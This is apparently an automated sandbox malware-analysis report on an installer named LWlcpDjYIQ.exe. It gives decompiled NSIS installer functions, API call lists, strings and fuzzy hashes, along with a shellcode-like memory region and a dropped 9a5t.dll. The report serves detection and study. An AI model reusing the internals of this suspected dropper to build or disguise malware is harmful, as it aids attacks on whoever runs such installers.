                                                                            • Part of subcall function 004056AC: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056D2
                                                                          • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402CA0
                                                                          • DestroyWindow.USER32(00000000,00420C58,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402DD8
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402E14
                                                                          Strings
                                                                          • Null, xrefs: 00402D2F
                                                                          • Error launching installer, xrefs: 00402C8D
                                                                          • Inst, xrefs: 00402D19
                                                                          • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                                                          • "C:\Users\user\Desktop\LWlcpDjYIQ.exe" , xrefs: 00402C41
                                                                          • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
                                                                          • soft, xrefs: 00402D26
                                                                          • verifying installer: %d%%, xrefs: 00402D89
                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                          • String ID: "C:\Users\user\Desktop\LWlcpDjYIQ.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                          • API String ID: 2181728824-1829226824
                                                                          • Opcode ID: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
                                                                          • Instruction ID: c463052a9c5fa83953bbfa6958f4efa241c8f41de6c5b3e58a45a606a63aebe6
                                                                          • Opcode Fuzzy Hash: 853037081203bd668ba06eaad4f70a360d5dbacfb2310b69b9c297ac7c642539
                                                                          • Instruction Fuzzy Hash: D561BE70A00214ABDB21AFA5DE49B9F7BB4BF14714F60813BE900B62D1D7B89D418B9D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402EBD, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 176fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				int _t72;
				long _t75;
				intOrPtr _t80;
				long _t81;
				void* _t83;
				int _t85;
				void* _t98;
				void* _t101;
				long _t102;
				signed int _t103;
				long _t104;
				int _t105;
				intOrPtr _t106;
				long _t107;
				void* _t108;

				_t103 = _a16;
				_t98 = _a12;
				_v12 = _t103;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x418c58;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E0040311B( *0x42f478 + _t66);
				}
				_t68 = E004030E9( &_a16, 4); // executed
				if(_t68 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 == 0) {
							while(_a16 > 0) {
								_t104 = _v12;
								if(_a16 < _t104) {
									_t104 = _a16;
								}
								if(E004030E9(0x414c58, _t104) == 0) {
									goto L34;
								} else {
									_t72 = WriteFile(_a8, 0x414c58, _t104,  &_a12, 0); // executed
									if(_t72 == 0 || _t104 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t69);
										return _t69;
									} else {
										_v8 = _v8 + _t104;
										_a16 = _a16 - _t104;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t103) {
							_t103 = _a16;
						}
						if(E004030E9(_t98, _t103) != 0) {
							_v8 = _t103;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t75 = GetTickCount();
					 *0x40b57c =  *0x40b57c & 0x00000000;
					 *0x40b578 =  *0x40b578 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b060 = 8;
					 *0x414c08 = 0x40cc00;
					 *0x414c04 = 0x40cc00;
					 *0x414c00 = 0x414c00;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t105 = 0x4000;
						if(_a16 < 0x4000) {
							_t105 = _a16;
						}
						if(E004030E9(0x414c58, _t105) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t105;
						 *0x40b050 = 0x414c58;
						 *0x40b054 = _t105;
						while(1) {
							_t101 = _v16;
							 *0x40b058 = _t101;
							 *0x40b05c = _v12;
							_t80 = E00405DB9(":TA");
							_v28 = _t80;
							if(_t80 < 0) {
								break;
							}
							_t106 =  *0x40b058; // 0x41a058
							_t107 = _t106 - _t101;
							_t81 = GetTickCount();
							_t102 = _t81;
							if(( *0x4092a0 & 0x00000001) != 0 && (_t81 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t108 = _t108 + 0xc;
								E00404D7E(0,  &_v92);
								_v20 = _t102;
							}
							if(_t107 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t107;
									_v8 = _v8 + _t107;
									_t83 =  *0x40b058; // 0x41a058
									_v16 = _t83;
									if(_v12 < 1) {
										goto L45;
									}
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t85 = WriteFile(_a8, _v16, _t107,  &_v24, 0); // executed
								if(_t85 == 0 || _v24 != _t107) {
									goto L29;
								} else {
									_v8 = _v8 + _t107;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                                          0x00402ec5
                                                                          0x00402ec9
                                                                          0x00402ecc
                                                                          0x00402ed1
                                                                          0x00402ed3
                                                                          0x00402ed3
                                                                          0x00402eda
                                                                          0x00402ede
                                                                          0x00402ee3
                                                                          0x00402ee5
                                                                          0x00402ee5
                                                                          0x00402eec
                                                                          0x00402ef1
                                                                          0x00402efc
                                                                          0x00402efc
                                                                          0x00402f07
                                                                          0x00402f0e
                                                                          0x00403094
                                                                          0x00403094
                                                                          0x00000000
                                                                          0x00402f14
                                                                          0x00402f18
                                                                          0x0040307f
                                                                          0x004030d4
                                                                          0x00403099
                                                                          0x0040309f
                                                                          0x004030a1
                                                                          0x004030a1
                                                                          0x004030b2
                                                                          0x00000000
                                                                          0x004030b4
                                                                          0x004030bf
                                                                          0x004030c7
                                                                          0x00403079
                                                                          0x00403079
                                                                          0x00403096
                                                                          0x00403096
                                                                          0x00000000
                                                                          0x004030ce
                                                                          0x004030ce
                                                                          0x004030d1
                                                                          0x00000000
                                                                          0x004030d1
                                                                          0x004030c7
                                                                          0x004030b2
                                                                          0x004030df
                                                                          0x00000000
                                                                          0x004030df
                                                                          0x00403084
                                                                          0x00403086
                                                                          0x00403086
                                                                          0x00403092
                                                                          0x004030dc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403092
                                                                          0x00402f24
                                                                          0x00402f26
                                                                          0x00402f2d
                                                                          0x00402f34
                                                                          0x00402f34
                                                                          0x00402f3b
                                                                          0x00402f43
                                                                          0x00402f4d
                                                                          0x00402f52
                                                                          0x00402f5a
                                                                          0x00402f64
                                                                          0x00402f67
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402f6d
                                                                          0x00402f6d
                                                                          0x00402f6d
                                                                          0x00402f75
                                                                          0x00402f77
                                                                          0x00402f77
                                                                          0x00402f88
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402f8e
                                                                          0x00402f91
                                                                          0x00402f97
                                                                          0x00402f9d
                                                                          0x00402f9d
                                                                          0x00402fa8
                                                                          0x00402fae
                                                                          0x00402fb3
                                                                          0x00402fba
                                                                          0x00402fbd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402fc3
                                                                          0x00402fc9
                                                                          0x00402fcb
                                                                          0x00402fd4
                                                                          0x00402fd6
                                                                          0x00403004
                                                                          0x0040300a
                                                                          0x00403013
                                                                          0x00403018
                                                                          0x00403018
                                                                          0x0040301f
                                                                          0x0040306d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403021
                                                                          0x00403024
                                                                          0x00403046
                                                                          0x00403049
                                                                          0x0040304c
                                                                          0x00403055
                                                                          0x00403058
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040305e
                                                                          0x00403062
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403068
                                                                          0x00403032
                                                                          0x0040303a
                                                                          0x00000000
                                                                          0x00403041
                                                                          0x00403041
                                                                          0x00000000
                                                                          0x00403041
                                                                          0x0040303a
                                                                          0x0040301f
                                                                          0x00403075
                                                                          0x00000000
                                                                          0x00403075
                                                                          0x00000000
                                                                          0x00402f6d

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402F24
                                                                          • GetTickCount.KERNEL32 ref: 00402FCB
                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FF4
                                                                          • wsprintfA.USER32 ref: 00403004
                                                                          • WriteFile.KERNELBASE(00000000,00000000,0041A058,7FFFFFFF,00000000), ref: 00403032
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: CountTick$FileWritewsprintf
                                                                          • String ID: ... %d%%$:TA$XLA$XLA
                                                                          • API String ID: 4209647438-1582404621
                                                                          • Opcode ID: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
                                                                          • Instruction ID: 2a52969f5c244c71cf6e7afafcf32ff1ac156de72fa387f0f3f6be643268eac5
                                                                          • Opcode Fuzzy Hash: 459603e19e3c928dff072d88ee64108c5bddede1666523ec3534e88c32769053
                                                                          • Instruction Fuzzy Hash: 9761817190121ADBDF10DF65DA44AAF7BB8EB04356F10813BE910B72D4D7789E40CBA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040179D, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 151stringtimeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E0040179D(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				long _t49;
				long _t62;
				signed char _t63;
				long _t64;
				void* _t66;
				long _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t82;
				CHAR* _t84;
				void* _t87;

				_t77 = __ebx;
				_t84 = E00402A9A(0x31);
				 *(_t87 - 0x34) = _t84;
				 *(_t87 + 8) =  *(_t87 - 0x24) & 0x00000007;
				_t33 = E00405554(_t84);
				_push(_t84);
				if(_t33 == 0) {
					lstrcatA(E004054E8(E004059DB(0x409c40, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E004059DB();
				}
				E00405C17(0x409c40);
				while(1) {
					__eflags =  *(_t87 + 8) - 3;
					if( *(_t87 + 8) >= 3) {
						_t66 = E00405CB0(0x409c40);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t87 - 0x18);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t87 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t87 + 8) = _t72;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) == _t77) {
						_t63 = GetFileAttributesA(0x409c40); // executed
						_t64 = _t63 & 0x000000fe;
						__eflags = _t64;
						SetFileAttributesA(0x409c40, _t64); // executed
					}
					__eflags =  *(_t87 + 8) - 1;
					_t41 = E004056AC(0x409c40, 0x40000000, (0 |  *(_t87 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t87 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t87 + 8) - _t77;
					if( *(_t87 + 8) != _t77) {
						E00404D7E(0xffffffe2,  *(_t87 - 0x34));
						__eflags =  *(_t87 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t87 - 4)) = 1;
						}
						L31:
						 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t87 - 4));
						__eflags =  *0x42f4a8;
						goto L32;
					} else {
						E004059DB(0x40a440, 0x430000);
						E004059DB(0x430000, 0x409c40);
						E004059FD(_t77, 0x40a440, 0x409c40, "C:\Users\hardz\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll",  *((intOrPtr*)(_t87 - 0x10)));
						E004059DB(0x430000, 0x40a440);
						_t62 = E004052DB("C:\Users\hardz\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll",  *(_t87 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4a8 =  *0x42f4a8 + 1;
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404D7E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D7E(0xffffffea,  *(_t87 - 0x34));
				 *0x4092a0 =  *0x4092a0 + 1;
				_t43 = E00402EBD( *((intOrPtr*)(_t87 - 0x1c)),  *(_t87 - 8), _t77, _t77); // executed
				 *0x4092a0 =  *0x4092a0 - 1;
				__eflags =  *(_t87 - 0x18) - 0xffffffff;
				_t82 = _t43;
				if( *(_t87 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t87 - 8), _t87 - 0x18, _t77, _t87 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t87 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t87 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t87 - 8)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E004059FD(_t77, _t82, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t87 - 0x34));
					}
					_push(0x200010);
					_push(0x409c40);
					E004052DB();
					goto L29;
				}
				goto L33;
			}


















                                                                          0x0040179d
                                                                          0x004017a4
                                                                          0x004017ad
                                                                          0x004017b0
                                                                          0x004017b3
                                                                          0x004017b8
                                                                          0x004017c0
                                                                          0x004017dc
                                                                          0x004017c2
                                                                          0x004017c2
                                                                          0x004017c3
                                                                          0x004017c3
                                                                          0x004017e2
                                                                          0x004017ec
                                                                          0x004017ec
                                                                          0x004017f0
                                                                          0x004017f3
                                                                          0x004017f8
                                                                          0x004017fa
                                                                          0x004017fc
                                                                          0x00401801
                                                                          0x00401801
                                                                          0x0040180c
                                                                          0x0040180c
                                                                          0x0040181d
                                                                          0x0040181f
                                                                          0x0040181f
                                                                          0x00401820
                                                                          0x00401820
                                                                          0x00401823
                                                                          0x00401826
                                                                          0x00401829
                                                                          0x0040182f
                                                                          0x0040182f
                                                                          0x00401833
                                                                          0x00401833
                                                                          0x0040183b
                                                                          0x0040184a
                                                                          0x0040184f
                                                                          0x00401852
                                                                          0x00401855
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401857
                                                                          0x0040185a
                                                                          0x004018b4
                                                                          0x004018b9
                                                                          0x004015ca
                                                                          0x004026da
                                                                          0x004026da
                                                                          0x0040292f
                                                                          0x00402932
                                                                          0x00402932
                                                                          0x00000000
                                                                          0x0040185c
                                                                          0x00401862
                                                                          0x0040186d
                                                                          0x0040187a
                                                                          0x00401885
                                                                          0x0040189b
                                                                          0x0040189b
                                                                          0x0040189e
                                                                          0x00000000
                                                                          0x004018a4
                                                                          0x004018a4
                                                                          0x004018a5
                                                                          0x004018c2
                                                                          0x00402938
                                                                          0x00402938
                                                                          0x00402938
                                                                          0x004018a7
                                                                          0x004018a7
                                                                          0x004018a8
                                                                          0x00401495
                                                                          0x00402293
                                                                          0x00402293
                                                                          0x00402293
                                                                          0x004018a5
                                                                          0x0040189e
                                                                          0x0040293a
                                                                          0x0040293e
                                                                          0x0040293e
                                                                          0x004018d2
                                                                          0x004018d7
                                                                          0x004018e5
                                                                          0x004018ea
                                                                          0x004018f0
                                                                          0x004018f4
                                                                          0x004018f6
                                                                          0x004018fe
                                                                          0x0040190a
                                                                          0x004018f8
                                                                          0x004018f8
                                                                          0x004018fc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004018fc
                                                                          0x00401913
                                                                          0x00401919
                                                                          0x0040191b
                                                                          0x00000000
                                                                          0x00401921
                                                                          0x00401921
                                                                          0x00401924
                                                                          0x0040193c
                                                                          0x00401926
                                                                          0x00401929
                                                                          0x00401932
                                                                          0x00401932
                                                                          0x00401941
                                                                          0x00401946
                                                                          0x0040228e
                                                                          0x00000000
                                                                          0x0040228e
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Hyvkfcorf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017DC
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Hyvkfcorf,Hyvkfcorf,00000000,00000000,Hyvkfcorf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401806
                                                                          • GetFileAttributesA.KERNELBASE(Hyvkfcorf,Hyvkfcorf,00000000,00000000,Hyvkfcorf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401829
                                                                          • SetFileAttributesA.KERNELBASE(Hyvkfcorf,00000000), ref: 00401833
                                                                            • Part of subcall function 004059DB: lstrcpynA.KERNEL32(?,?,00000400,004031B8,obsolete Setup,NSIS Error), ref: 004059E8
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                                            • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,74B5EA30), ref: 00404DDA
                                                                            • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileMessageSend$Attributeslstrcatlstrlen$CompareTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll$Hyvkfcorf
                                                                          • API String ID: 1152937526-993071674
                                                                          • Opcode ID: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
                                                                          • Instruction ID: cdaedd3c6a5390e1bf503350d98347a993321a7ff473c6b68b0c18fdf3b675ae
                                                                          • Opcode Fuzzy Hash: 15c6a27cd28eff93ecf0c019d82d4cc94b36f01a0f52ceaa2930de3d842a783a
                                                                          • Instruction Fuzzy Hash: 69419172900519BBCB11BBA5CD46EAF36A9EF05329B20423BF511F11E1D67C4A41CAAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 029111E1, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 314memoryfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 029114A4
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 029114FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220670913.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                          Similarity
                                                                          • API ID: AllocCreateFileVirtual
                                                                          • String ID: f23f62c7253b4215b766deb8996e2f57
                                                                          • API String ID: 1475775534-66094342
                                                                          • Opcode ID: d509f9fd10dc41772751a21fb7a63161b73aaac8fef9ef16b69738c2adf20fd5
                                                                          • Instruction ID: 40b3b7685a572ac3a0c957da156f6d9fc46e00daccc2b113ab6899a1ac515c56
                                                                          • Opcode Fuzzy Hash: d509f9fd10dc41772751a21fb7a63161b73aaac8fef9ef16b69738c2adf20fd5
                                                                          • Instruction Fuzzy Hash: 98D12A31E4438CEEEB21DBE4DD05BEDBBB5AF04704F14409AE648BA191D7B60A84DF15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0291070F, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02910811
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 029109DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220670913.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: 6618d252fb428503b252b97c324e88d5ed9ebb1d8e18f85020dcd2d632f75082
                                                                          • Instruction ID: dce72dd3a49d71647a2afbb9202b98318dd1fed6fa3c1dbf3f7d9f0100a9edf7
                                                                          • Opcode Fuzzy Hash: 6618d252fb428503b252b97c324e88d5ed9ebb1d8e18f85020dcd2d632f75082
                                                                          • Instruction Fuzzy Hash: 58A1EF30E0020DEFEF10DFA5C995BADBBB1AF08315F20445AEA15BA2A0D7765A80DF54
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 84%
                                                                          			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040557B(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E00405513(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059DB("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                          0x004015d5
                                                                          0x004015dc
                                                                          0x004015e6
                                                                          0x004015e8
                                                                          0x004015ee
                                                                          0x004015f6
                                                                          0x004015fc
                                                                          0x004015fe
                                                                          0x00401601
                                                                          0x00401609
                                                                          0x00401616
                                                                          0x00401623
                                                                          0x00401623
                                                                          0x00401618
                                                                          0x00401619
                                                                          0x00401621
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00401621
                                                                          0x00401616
                                                                          0x00401626
                                                                          0x00401629
                                                                          0x0040162b
                                                                          0x0040162c
                                                                          0x004015ee
                                                                          0x00401633
                                                                          0x00401653
                                                                          0x004021e8
                                                                          0x00401635
                                                                          0x00401637
                                                                          0x00401642
                                                                          0x00401648
                                                                          0x00401648
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                            • Part of subcall function 0040557B: CharNextA.USER32(1S@,?,0042BCA8,C:\Users\user\AppData\Local\Temp\,004055DF,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00405589
                                                                            • Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040558E
                                                                            • Part of subcall function 0040557B: CharNextA.USER32(00000000), ref: 0040559D
                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
